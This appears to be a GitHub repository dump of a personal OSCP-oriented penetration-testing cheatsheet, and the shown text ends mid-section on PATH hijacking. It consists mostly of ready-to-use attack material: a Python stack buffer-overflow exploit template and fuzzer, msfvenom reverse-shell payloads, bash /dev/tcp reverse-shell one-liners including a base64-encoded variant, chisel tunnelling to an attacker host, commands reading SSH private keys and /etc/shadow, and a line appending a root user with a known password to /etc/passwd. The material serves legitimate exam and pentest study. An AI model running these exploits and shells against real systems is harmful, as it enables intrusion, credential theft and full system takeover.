├── .gitignore ├── .tocignore ├── LICENSE ├── README.md ├── enum_and_exploit ├── README.md ├── buffer_overflow │ ├── README.md │ └── buffer_overflow_diagram.png ├── linux │ └── README.md ├── sqlite │ └── README.md ├── tcp-135-539-msrpc │ └── README.md ├── tcp-139-445-smb │ └── README.md ├── tcp-1433-mssql │ └── README.md ├── tcp-1521-oracle_db │ └── README.md ├── tcp-20-21-ftp │ └── README.md ├── tcp-2049-nfs │ └── README.md ├── tcp-22-ssh │ └── README.md ├── tcp-23-telnet │ └── README.md ├── tcp-25-465-587-smtp │ └── README.md ├── tcp-27017-mongodb │ └── README.md ├── tcp-3306-mysql │ └── README.md ├── tcp-3389-rdp │ └── README.md ├── tcp-53-dns │ └── README.md ├── tcp-5432-pgsql │ └── README.md ├── tcp-5985-5986-winrm │ └── README.md ├── tcp-6379-redis │ └── README.md ├── tcp-80-443-http │ ├── README.md │ └── domain_verifier.py ├── tcp-8082-9092-h2 │ └── README.md ├── tcp-873-rsync │ └── README.md ├── udp-161-snmp │ └── README.md ├── utils │ └── README.md └── windows │ └── README.md ├── toc_generator.py └── vm_config └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Project-specific stuff 2 | gh-md-toc 3 | .obsidian/** 4 | .idea/** 5 | *.iml 6 | *.ipr 7 | 8 | # General 9 | .DS_Store 10 | .AppleDouble 11 | .LSOverride 12 | 13 | # Icon must end with two \r 14 | Icon 15 | 16 | # Thumbnails 17 | ._* 18 | 19 | # Files that might appear in the root of a volume 20 | .DocumentRevisions-V100 21 | .fseventsd 22 | .Spotlight-V100 23 | .TemporaryItems 24 | .Trashes 25 | .VolumeIcon.icns 26 | .com.apple.timemachine.donotpresent 27 | 28 | # Directories potentially created on remote AFP share 29 | .AppleDB 30 | .AppleDesktop 31 | Network Trash Folder 32 | Temporary Items 33 | .apdisk 34 | 35 | # Byte-compiled / optimized / DLL files 36 | __pycache__/ 37 | *.py[cod] 38 | *$py.class 39 | 40 | # C extensions 41 | *.so 42 | 43 | # Distribution / packaging 44 | .Python 45 | build/ 46 | develop-eggs/ 47 | dist/ 48 | 
downloads/ 49 | eggs/ 50 | .eggs/ 51 | lib/ 52 | lib64/ 53 | parts/ 54 | sdist/ 55 | var/ 56 | wheels/ 57 | pip-wheel-metadata/ 58 | share/python-wheels/ 59 | *.egg-info/ 60 | .installed.cfg 61 | *.egg 62 | MANIFEST 63 | 64 | # PyInstaller 65 | # Usually these files are written by a python script from a template 66 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 67 | *.manifest 68 | *.spec 69 | 70 | # Installer logs 71 | pip-log.txt 72 | pip-delete-this-directory.txt 73 | 74 | # Unit test / coverage reports 75 | htmlcov/ 76 | .tox/ 77 | .nox/ 78 | .coverage 79 | .coverage.* 80 | .cache 81 | nosetests.xml 82 | coverage.xml 83 | *.cover 84 | *.py,cover 85 | .hypothesis/ 86 | .pytest_cache/ 87 | 88 | # Translations 89 | *.mo 90 | *.pot 91 | 92 | # Django stuff: 93 | *.log 94 | local_settings.py 95 | db.sqlite3 96 | db.sqlite3-journal 97 | 98 | # Flask stuff: 99 | instance/ 100 | .webassets-cache 101 | 102 | # Scrapy stuff: 103 | .scrapy 104 | 105 | # Sphinx documentation 106 | docs/_build/ 107 | 108 | # PyBuilder 109 | target/ 110 | 111 | # Jupyter Notebook 112 | .ipynb_checkpoints 113 | 114 | # IPython 115 | profile_default/ 116 | ipython_config.py 117 | 118 | # pyenv 119 | .python-version 120 | 121 | # pipenv 122 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 123 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 124 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 125 | # install all needed dependencies. 126 | #Pipfile.lock 127 | 128 | # PEP 582; used by e.g. 
github.com/David-OConnor/pyflow 129 | __pypackages__/ 130 | 131 | # Celery stuff 132 | celerybeat-schedule 133 | celerybeat.pid 134 | 135 | # SageMath parsed files 136 | *.sage.py 137 | 138 | # Environments 139 | .env 140 | .venv 141 | env/ 142 | venv/ 143 | ENV/ 144 | env.bak/ 145 | venv.bak/ 146 | 147 | # Spyder project settings 148 | .spyderproject 149 | .spyproject 150 | 151 | # Rope project settings 152 | .ropeproject 153 | 154 | # mkdocs documentation 155 | /site 156 | 157 | # mypy 158 | .mypy_cache/ 159 | .dmypy.json 160 | dmypy.json 161 | 162 | # Pyre type checker 163 | .pyre/ 164 | 165 | # CMake 166 | cmake-build-*/ 167 | 168 | # File-based project format 169 | *.iws 170 | 171 | # IntelliJ 172 | out/ 173 | 174 | # mpeltonen/sbt-idea plugin 175 | .idea_modules/ 176 | 177 | # JIRA plugin 178 | atlassian-ide-plugin.xml 179 | 180 | # Crashlytics plugin (for Android Studio and IntelliJ) 181 | com_crashlytics_export_strings.xml 182 | crashlytics.properties 183 | crashlytics-build.properties 184 | fabric.properties 185 | -------------------------------------------------------------------------------- /.tocignore: -------------------------------------------------------------------------------- 1 | README.md -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Maksym Chernikov 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be 
included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Pentest Everything 2 | 3 | This is my penetration testing cheatsheet. 4 | 5 | _I initially created this cheatsheet for the 2021 **OSCP** exam, but it is **no longer comprehensive** since the exam 6 | was drastically changed in early 2022._ 7 | 8 | [Github-md-toc-generator](https://github.com/maksyche/github-md-toc-generator) is used to generate Tables of Contents. 
9 | 10 | **"Test it even if you think that someone has already covered it!"** 11 | 12 | ``` 13 | ─────█─▄▀█──█▀▄─█───── 14 | ────▐▌──────────▐▌──── 15 | ────█▌▀▄──▄▄──▄▀▐█──── 16 | ───▐██──▀▀──▀▀──██▌─── 17 | ──▄████▄──▐▌──▄████▄── 18 | ``` 19 | 20 | --- 21 | 22 | ### Contents 23 | 24 | - [Virtual Machine Configuration](/vm_config/README.md) 25 | - [Enumeration and Exploitation of Services and Systems](/enum_and_exploit/README.md) 26 | -------------------------------------------------------------------------------- /enum_and_exploit/README.md: -------------------------------------------------------------------------------- 1 | # Enumeration and exploitation 2 | * [Terminal logging](#terminal-logging) 3 | * [Subdomain Discovery](#subdomain-discovery) 4 | * [Port scanning](#port-scanning) 5 | * [Enumerating common ports and services](#enumerating-common-ports-and-services) 6 | 7 | ## Terminal logging 8 | - Always start logging terminal history before running any commands: 9 | ```bash 10 | script -f ./history-.log 11 | ``` 12 | 13 | ## Subdomain Discovery 14 | - Google: `site:*.` 15 | - Sublist3r _(better use VPN in case of blocks)_: 16 | ```bash 17 | python ~/sublist3r/sublist3r.py -d -o domains.txt -t 1 18 | ``` 19 | 20 | ## Port scanning 21 | - Scan common TCP ports of domains listed in the file: 22 | ```bash 23 | nmap -v -sV -sC -iL ./domains.txt -oN nmap.txt 24 | ``` 25 | - Scan common TCP ports: 26 | ```bash 27 | nmap -v -sV -sC 28 | ``` 29 | - Aggressively SYN scan all TCP ports: 30 | ```bash 31 | sudo nmap -v -p- -sS -A 32 | ``` 33 | - Scan all TCP ports for known vulnerabilities: 34 | ```bash 35 | sudo nmap -v -p- --script vuln 36 | ``` 37 | - Aggressively scan common UDP ports: 38 | ```bash 39 | sudo nmap -v --top-ports 20 -A -sU 40 | ``` 41 | 42 | ## Enumerating common ports and services 43 | - [TCP 20, 21 - File Transfer Protocol _(FTP)_](tcp-20-21-ftp/README.md) 44 | - [TCP 22 - Secure Shell _(SSH)_](tcp-22-ssh/README.md) 45 | - [TCP 23 - 
Telnet](tcp-23-telnet/README.md) 46 | - [TCP 25, 465, 578 - Simple Mail Transfer Protocol _(SMTP)_](tcp-25-465-587-smtp/README.md) 47 | - [TCP 53 - Domain Name System _(DNS)_](tcp-53-dns/README.md) 48 | - [TCP 80, 443 - HTTP](tcp-80-443-http/README.md) 49 | - [TCP 135, 539 - Microsoft Remote Procedure Call _(MSRPC)_](tcp-135-539-msrpc/README.md) 50 | - [TCP 139, 445 - Server Message Block _(SMB)_](tcp-139-445-smb/README.md) 51 | - [TCP 873 - Rsync](tcp-873-rsync/README.md) 52 | - [TCP 1433 - Microsoft SQL Server _(MSSQL)_](tcp-1433-mssql/README.md) 53 | - [TCP 1521 - Oracle DB](tcp-1521-oracle_db/README.md) 54 | - [TCP 2049 - Network File System _(NFS)_](tcp-2049-nfs/README.md) 55 | - [TCP 3306 - MySQL](tcp-3306-mysql/README.md) 56 | - [TCP 3389 - Remote Desktop Protocol _(RDP)_](tcp-3389-rdp/README.md) 57 | - [TCP 5432 - PostgreSQL](tcp-5432-pgsql/README.md) 58 | - [TCP 5985, 5986 - Windows Remote Management _(WinRM)_](tcp-5985-5986-winrm/README.md) 59 | - [TCP 6379 - Redis](tcp-6379-redis/README.md) 60 | - [TCP 8082, 9092 - H2](tcp-8082-9092-h2/README.md) 61 | - [TCP 27017 - MongoDB](tcp-27017-mongodb/README.md) 62 | - [UDP 161 - Simple Network Management Protocol _(SNMP)_](udp-161-snmp/README.md) 63 | - [Sqlite](sqlite/README.md) 64 | - [Buffer Overflow](buffer_overflow/README.md) 65 | - [Linux Privesc](linux/README.md) 66 | - [Windows Privesc](windows/README.md) 67 | - [Utilities](utils/README.md) 68 | -------------------------------------------------------------------------------- /enum_and_exploit/buffer_overflow/README.md: -------------------------------------------------------------------------------- 1 | # Stack Buffer Overflow enumeration and exploitation 2 | * [A piece of theory](#a-piece-of-theory) 3 | * [Definitions](#definitions) 4 | * [Graphical presentation](#graphical-presentation) 5 | * [Tools](#tools) 6 | * [Immunity Debugger](#immunity-debugger) 7 | * [Mona](#mona) 8 | * [Enumeration](#enumeration) 9 | * [Fuzzing](#fuzzing) 10 | * [Finding the 
EIP offset](#finding-the-eip-offset) 11 | * [Finding bad chars](#finding-bad-chars) 12 | * [Finding a jump point](#finding-a-jump-point) 13 | * [Exploitation](#exploitation) 14 | * [Generating a payload](#generating-a-payload) 15 | * [Adding NOPs](#adding-nops) 16 | * [Getting the reverse shell](#getting-the-reverse-shell) 17 | 18 | ## A piece of theory 19 | ### Definitions 20 | - **Stack frame** - function-specific section of the stack. 21 | - **ESP** _(Extended Stack Pointer)_ points to the current top of the stack. It's changed every time something is pushed/popped to the stack. 22 | - **EBP** _(Extended Base Pointer)_ points to the previous frame's base pointer. 23 | - **EIP** _(Extended Instruction Pointer)_ points to the next executing command. 24 | - **JMP ESP** - instruction to jump to the current top of the stack _(encoded as `\xFF\xE4`)_. 25 | - **NOP** _(no operation)_ - instruction to do nothing and jump to the next instruction in the flow _(Intel x86 NOP opcode is `\x90`)_. 26 | 27 | ### Graphical presentation 28 | ![](buffer_overflow_diagram.png) 29 | 30 | ## Tools 31 | ### Immunity Debugger 32 | - Download and install: https://debugger.immunityinc.com/ID_register.py 33 | - Always run it **as Administrator**. 34 | - Use `File -> Attach` for already running apps and services or use `File -> Open` to run executable _(some services should be restarted using `sc stop/start `)_. 35 | - Unpause application. 36 | - Use the Windows menu to jump between mona results, log data, and CPU. 37 | 38 | ### Mona 39 | - Download it: https://raw.githubusercontent.com/corelan/mona/master/mona.py 40 | - Copy it to the PyCommands folder _(default path is `C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands`)_. 
41 | - Set working directory for Mona in Immunity Debugger: 42 | ```bash 43 | !mona config -set workingfolder c:\mona\buffer_overflow 44 | ``` 45 | 46 | ## Enumeration 47 | ### Fuzzing 48 | - Create `fuzzer.py`: 49 | ```python 50 | import socket, time, sys 51 | 52 | ip = "" 53 | port = 54 | timeout = 5 55 | 56 | buffer = [] 57 | counter = 100 58 | while len(buffer) < 30: 59 | buffer.append("A" * counter) 60 | counter += 100 61 | 62 | for string in buffer: 63 | try: 64 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 65 | s.settimeout(timeout) 66 | connect = s.connect((ip, port)) 67 | s.recv(1024) 68 | print("Fuzzing with %s bytes" % len(string)) 69 | s.send(" " + string + "\r\n") # Add space after the command 70 | s.recv(1024) 71 | s.send("QUIT\r\n") 72 | s.recv(1024) 73 | s.close() 74 | except: 75 | print("Could not connect to " + ip + ":" + str(port)) 76 | sys.exit(0) 77 | time.sleep(1) 78 | ``` 79 | - Run using `python` or `python2`. 80 | 81 | ### Finding the EIP offset 82 | - Create the `exploit.py` file: 83 | ```python 84 | import socket 85 | 86 | ip = "" 87 | port = 88 | 89 | prefix = " " # Add space after the command 90 | offset = 0 91 | overflow = "A" * offset 92 | retn = "" 93 | padding = "" 94 | payload = "" 95 | postfix = "" 96 | 97 | buffer = prefix + overflow + retn + padding + payload + postfix 98 | 99 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 100 | 101 | try: 102 | s.connect((ip, port)) 103 | print("Sending evil buffer...") 104 | s.send(buffer + "\r\n") 105 | print("Done!") 106 | except: 107 | print("Could not connect.") 108 | ``` 109 | - Set the payload value: 110 | ```bash 111 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l # Value of fuzzing + couple hundred extra bytes. 112 | ``` 113 | - Run using `python` or `python2`. 
114 | - Get EIP offset by running `pattern_offset.rb`: 115 | ```bash 116 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l -q 117 | ``` 118 | - Set EIP `offset` in the `exploit.py`, empty the `payload`, and set `retn` value to `BBBB`. 119 | - Run again and check the EIP register in the Registers window. It should be `42424242` now. 120 | 121 | ### Finding bad chars 122 | - Generate a bytearray using mona, and exclude the null byte _(`\x00`)_: 123 | ```bash 124 | !mona bytearray -b "\x00" 125 | ``` 126 | - Copy chars to the `payload` of the `exploit.py` and run it again: 127 | ```python 128 | \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff 129 | ``` 130 | - Compare chars using mona: 131 | ```bash 132 | !mona compare -f C:\mona\buffer_overflow\bytearray.bin -a 133 | ``` 134 | - Note all bad chars except for the `00`. 
135 | - Generate bytearray again excluding bad chars _(notice, often the byte after the bad char gets corrupted, so it's better to include only the first one of the sequence)_: 136 | ```bash 137 | !mona bytearray -b "\x00" 138 | ``` 139 | - Remove bad chars from the `payload` of the `exploit.py` and run it again. 140 | - Compare chars again. 141 | - Continue this process till there are no bad chars. 142 | 143 | ### Finding a jump point 144 | - Find all `jmp esp` using mona: 145 | ```bash 146 | !mona jmp -r esp -cpb "\x00" 147 | ``` 148 | - Take any of addresses that have no protection and put it in the `retn` variable of the `exploit.py`, but backwards _(for example: `625011AF -> \xaf\x11\x50\x62`)_. 149 | 150 | ## Exploitation 151 | ### Generating a payload 152 | - Generate a payload including all bad chars: 153 | ```bash 154 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -b "\x00" -f py # sometimes it's better to use C as the filetype 155 | ``` 156 | - Copy `buf` variable to the `exploit.py` file and set `payload` equal to it. 
157 | 158 | ### Adding NOPs 159 | - Since pointers may change a bit it's better to add NOPs to "slide" to the right position _(add this to `exploit.py`)_: 160 | ```python 161 | padding = "\x90" * 16 # May be more than 16 162 | ``` 163 | 164 | ### Getting the reverse shell 165 | - Just listen to the reverse shell and run `exploit.py`: 166 | ```bash 167 | rlwrap nc -lvnp 443 168 | ``` 169 | -------------------------------------------------------------------------------- /enum_and_exploit/buffer_overflow/buffer_overflow_diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maksyche/pentest-everything/ad01a1532aefce3e9111994e2bf05ba38f24803a/enum_and_exploit/buffer_overflow/buffer_overflow_diagram.png -------------------------------------------------------------------------------- /enum_and_exploit/linux/README.md: -------------------------------------------------------------------------------- 1 | # Linux privilege escalation 2 | * [Utilities](#utilities) 3 | * [Shell stabilization and interactivity](#shell-stabilization-and-interactivity) 4 | * [Useful reverse shells](#useful-reverse-shells) 5 | * [Port forwarding/tunneling](#port-forwardingtunneling) 6 | * [Copy files from/to the target](#copy-files-fromto-the-target) 7 | * [Autoenumeration _(LinPEAS)_](#autoenumeration-linpeas) 8 | * [Monitoring processes _(PSPY)_](#monitoring-processes-pspy) 9 | * [Autoenumeration _(Linux Smart Enumeration)_](#autoenumeration-linux-smart-enumeration) 10 | * [Linux Exploit Suggester](#linux-exploit-suggester) 11 | * [Manual enumeration](#manual-enumeration) 12 | * [System](#system) 13 | * [Users and groups](#users-and-groups) 14 | * [Apps and services](#apps-and-services) 15 | * [Network](#network) 16 | * [Files and folders](#files-and-folders) 17 | * [Possible escalation vectors in programs](#possible-escalation-vectors-in-programs) 18 | * [Compiling exploits and tools](#compiling-exploits-and-tools) 19 | * 
[Readable /etc/shadow exploit](#readable-etcshadow-exploit) 20 | * [Writable /etc/passwd or /etc/shadow exploit](#writable-etcpasswd-or-etcshadow-exploit) 21 | * [Exploiting wildcards](#exploiting-wildcards) 22 | * [Modifying `$PATH` for SUID/SUDO programs](#modifying-path-for-suidsudo-programs) 23 | * [Exploiting capabilities](#exploiting-capabilities) 24 | * [Python library hijacking](#python-library-hijacking) 25 | * [`LD_PRELOAD` exploit](#ld_preload-exploit) 26 | * [`LD_LIBRARY_PATH` exploit](#ld_library_path-exploit) 27 | * [Compiling a shared library running bash shell](#compiling-a-shared-library-running-bash-shell) 28 | * [Compiling a service running bash shell](#compiling-a-service-running-bash-shell) 29 | * [Permissions modification in NFS](#permissions-modification-in-nfs) 30 | 31 | ## Utilities 32 | ### Shell stabilization and interactivity 33 | - Listen to reverse shell: 34 | ```bash 35 | ncat -l 443 -v 36 | ``` 37 | - Upgrade the shell: 38 | ```bash 39 | python3 -c 'import pty;pty.spawn("/bin/bash")' 40 | ``` 41 | 42 | ### Useful reverse shells 43 | - Reverse shell oneliners (great website for shells: https://www.revshells.com/): 44 | ```bash 45 | bash -i >& /dev/tcp//443 0>&1 # bash 46 | bash -c "bash -i >& /dev/tcp//443 0>&1" # sh or dash 47 | zsh -c 'zmodload zsh/net/tcp && ztcp 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' # zsh 48 | ``` 49 | - Reverse shell encoded oneliner: 50 | ```bash 51 | echo "bash -c 'bash -i >& /dev/tcp//443 0>&1'" | base64 52 | echo '' | base64 --decode | bash 53 | ``` 54 | - TCP reverse shell executable: 55 | ```bash 56 | msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=443 -f elf > shell.elf 57 | ``` 58 | 59 | ### Port forwarding/tunneling 60 | - SSH 61 | ```bash 62 | ssh -L :localhost: @ # Run on kali to forward a blocked port 63 | ``` 64 | - Chisel (download versions for the victim and the attacker https://github.com/jpillora/chisel/releases): 65 | ```bash 66 | wget 
https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_darwin_arm64.gz 67 | wget https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_linux_amd64.gz 68 | gunzip chisel_1.10.0_darwin_arm64.gz 69 | gunzip chisel_1.10.0_linux_amd64.gz 70 | sudo python3 -m http.server 80 71 | ``` 72 | ```bash 73 | # Attacker 74 | ./chisel_1.10.0_darwin_arm64 server --socks5 --reverse -p 1337 75 | 76 | # Victim 77 | wget http:///chisel_1.10.0_linux_amd64 78 | chmod 777 chisel_1.10.0_linux_amd64 79 | 80 | ./chisel_1.10.0_linux_amd64 client :1337 R::127.0.0.1: 81 | ``` 82 | 83 | ### Copy files from/to the target 84 | - SCP: 85 | ```bash 86 | scp @: . 87 | scp @: 88 | ``` 89 | - FTP: 90 | ```bash 91 | python3 -m pyftpdlib -w -p 2121 92 | ``` 93 | ```cmd 94 | ftp # anonymous and empty pass 95 | open 2121 96 | put 97 | ``` 98 | - HTTP: 99 | ```bash 100 | sudo python3 -m http.server 80 101 | 102 | wget http:/// 103 | curl http:/// --output 104 | ``` 105 | 106 | ## Autoenumeration _(LinPEAS)_ 107 | - Prepare: 108 | ```bash 109 | wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O ./linpeas.sh 110 | 111 | cp ~/pentesting-tools/linpeas/linpeas.sh ./linpeas.sh # Or my stored version 112 | ``` 113 | - [Copy to the target](#copy-files-fromto-the-target) 114 | - Run: 115 | ```bash 116 | ./linpeas.sh > linpeas.txt 117 | ./linpeas.sh -a > linpeas.txt # Full search 118 | less -r linpeas.txt 119 | ``` 120 | 121 | ## Monitoring processes _(PSPY)_ 122 | - Prepare: 123 | ```bash 124 | cp ~/pentesting-tools/pspy/pspy32 ./pspy 125 | 126 | cp ~/pentesting-tools/pspy/pspy64 ./pspy # 64 bit version 127 | cp ~/pentesting-tools/pspy/pspy32s ./pspy # 32 bit small version 128 | cp ~/pentesting-tools/pspy/pspy64s ./pspy # 64 bit small version 129 | ``` 130 | - [Copy to the target](#copy-files-fromto-the-target) 131 | - Run: 132 | ```bash 133 | ./pspy # Needs process interrupt key to stop 134 | ``` 135 | 136 | ## Autoenumeration _(Linux Smart 
Enumeration)_ 137 | - Prepare: 138 | ```bash 139 | wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh -O ./lse.sh 140 | 141 | cp ~/pentesting-tools/lse/lse.sh ./lse.sh # Or my stored version 142 | ``` 143 | - [Copy to the target](#copy-files-fromto-the-target) 144 | - Run: 145 | ```bash 146 | ./lse.sh -i -l0 # Default level of information. Increase it up to 2 if nothing is found 147 | ``` 148 | 149 | ## Linux Exploit Suggester 150 | - Prepare: 151 | ```bash 152 | wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh 153 | 154 | cp ~/pentesting-tools/les/les.sh ./les.sh # Or my stored version 155 | ``` 156 | - [Copy to the target](#copy-files-fromto-the-target) 157 | - Run: 158 | ```bash 159 | ./les.sh 160 | ``` 161 | 162 | ## Manual enumeration 163 | ### System 164 | - System info: 165 | ```bash 166 | cat /etc/issue 167 | cat /etc/*-release 168 | cat /proc/version 169 | uname -a 170 | rpm -q kernel 171 | ``` 172 | - Environment variables: 173 | ```bash 174 | cat /etc/profile 175 | cat /etc/bashrc 176 | printenv 177 | env 178 | ``` 179 | 180 | ### Users and groups 181 | - Current user: 182 | ```bash 183 | id 184 | whoami 185 | ``` 186 | - Other users: 187 | ```bash 188 | cat /etc/passwd 189 | ``` 190 | - Groups: 191 | ```bash 192 | groups 193 | cat /etc/group 194 | ``` 195 | - User management files permissions: 196 | ```bash 197 | ls -l /etc/passwd 198 | ls -l /etc/shadow 199 | ls -l /etc/sudoers 200 | ls -l /etc/group 201 | ``` 202 | - `sudo` user privileges : 203 | ```bash 204 | sudo -l 205 | ``` 206 | - Shell history and configs: 207 | ```bash 208 | cat ~/.bash_profile 209 | cat ~/.bashrc 210 | cat ~/.profile 211 | cat ~/.bash_logout 212 | cat ~/.bash_history 213 | ``` 214 | - Mails: 215 | ```bash 216 | ls -l /var/mail 217 | ls -l /var/spool/mail 218 | ``` 219 | - SSH: 220 | ```bash 221 | cat /home//.ssh/authorized_keys 222 | cat /home//.ssh/identity.pub 223 | 
cat /home//.ssh/identity 224 | cat /home//.ssh/id_rsa.pub 225 | cat /home//.ssh/id_rsa 226 | cat /home//.ssh/id_dsa.pub 227 | cat /home//.ssh/id_dsa 228 | cat /etc/ssh/ssh_config 229 | cat /etc/ssh/sshd_config 230 | ``` 231 | 232 | ### Apps and services 233 | - Current processes 234 | ```bash 235 | ps aux 236 | ps -ef 237 | top 238 | ps aux | grep root 239 | ps -ef | grep root 240 | ``` 241 | - Installed apps: 242 | ```bash 243 | ls -lah /usr/bin/ 244 | ls -lah /usr/local/bin/ 245 | ls -lah /usr/local/sbin/ 246 | ls -lah /opt 247 | ``` 248 | - Scheduled jobs: 249 | ```bash 250 | cat /etc/crontab 251 | ls -l /var/spool/cron 252 | ls -l /var/spool/cron/crontabs 253 | cat /etc/cron.allow 254 | cat /etc/cron.deny 255 | cat /etc/anacrontab 256 | ``` 257 | - SUID/SGID programs: 258 | ```bash 259 | find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null # SUID and SGID with permissions 260 | find / -perm -u=s -type f 2>/dev/null # SUID only 261 | find / -perm -g=s -type f 2>/dev/null # SGID only 262 | ``` 263 | - Files with capabilities: 264 | ```bash 265 | getcap -r / 2>/dev/null 266 | ``` 267 | 268 | ### Network 269 | - General info: 270 | ```bash 271 | hostname 272 | ifconfig 273 | ``` 274 | - Open ports: 275 | ```bash 276 | lsof -i 277 | netstat -antup 278 | ss -tulpn 279 | nc -z -v 127.0.0.1 1-65535 280 | ``` 281 | - NFS shares: 282 | ```bash 283 | cat /etc/exports # Check if no_root_squash is set 284 | ``` 285 | 286 | ### Files and folders 287 | - List files in common folders: 288 | ```bash 289 | ls -lah ~ 290 | ls -lah /tmp 291 | ls -lah /opt 292 | ls -lah /opt/backup 293 | ls -lah /usr/local 294 | ls -lah /var/backups 295 | ls -lah /var/logs 296 | ls -lah /var/lib 297 | ls -lah /var/www 298 | ``` 299 | - File systems: 300 | ```bash 301 | mount 302 | df -h 303 | cat /etc/fstab 304 | ``` 305 | - Search for strings in file that don't start with `# ` _(useful for config files)_: 306 | ```bash 307 | cat | grep -v "^# " 308 | ``` 309 | - Search 
files contents: 310 | ```bash 311 | grep -rnw '/' -e '' 2> /dev/null 312 | ``` 313 | - Search for all .txt files: 314 | ```bash 315 | locate *.txt 316 | find / -type f -name "*.txt" 2>/dev/null 317 | ``` 318 | 319 | ## Possible escalation vectors in programs 320 | - https://gtfobins.github.io/ 321 | 322 | ## Compiling exploits and tools 323 | - Use this to compile exploits and tools if no specific instructions provided: 324 | ```bash 325 | gcc -o # add -fPIC for 64-bit machines 326 | g++ -o 327 | ``` 328 | - If a target machine doesn't have required tools to compile an exploit cross-compile it on Kali _(add `-m32` option for 32-bit machines)_. 329 | 330 | ## Readable /etc/shadow exploit 331 | - Just read the hash. 332 | - Or use `unshadow` (from `john` package on personal machine): 333 | ```bash 334 | unshadow passwd.txt shadow.txt > ./hash 335 | ``` 336 | - [Crack it](../utils/README.md#cracking-hashes) 337 | 338 | ## Writable /etc/passwd or /etc/shadow exploit 339 | - Even if these files are not writable, sometimes we can create symlinks to the files that can be made writable: 340 | ```bash 341 | ln -s /etc/passwd ~/passwd 342 | ``` 343 | - Create a password: 344 | ```bash 345 | openssl passwd -1 -salt 346 | ``` 347 | - Or use this prepared user: 348 | ```bash 349 | echo "new:\$1\$new\$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash" >> /etc/passwd 350 | ``` 351 | - Switch to the new user: 352 | ```bash 353 | su new # password:123 354 | ``` 355 | 356 | ## Exploiting wildcards 357 | - Check options for the command that uses the wildcard: https://gtfobins.github.io/gtfobins/ 358 | - Create files in the current directory with filenames as options: 359 | ```bash 360 | touch ./-- 361 | ``` 362 | 363 | ## Modifying `$PATH` for SUID/SUDO programs 364 | - Make alternative command which runs privileged bash: 365 | ```bash 366 | echo "/bin/bash -p" > /tmp/ 367 | chmod +x /tmp/ 368 | ``` 369 | - Modify `$PATH`: 370 | ```bash 371 | export PATH=/tmp:$PATH # To start searching 
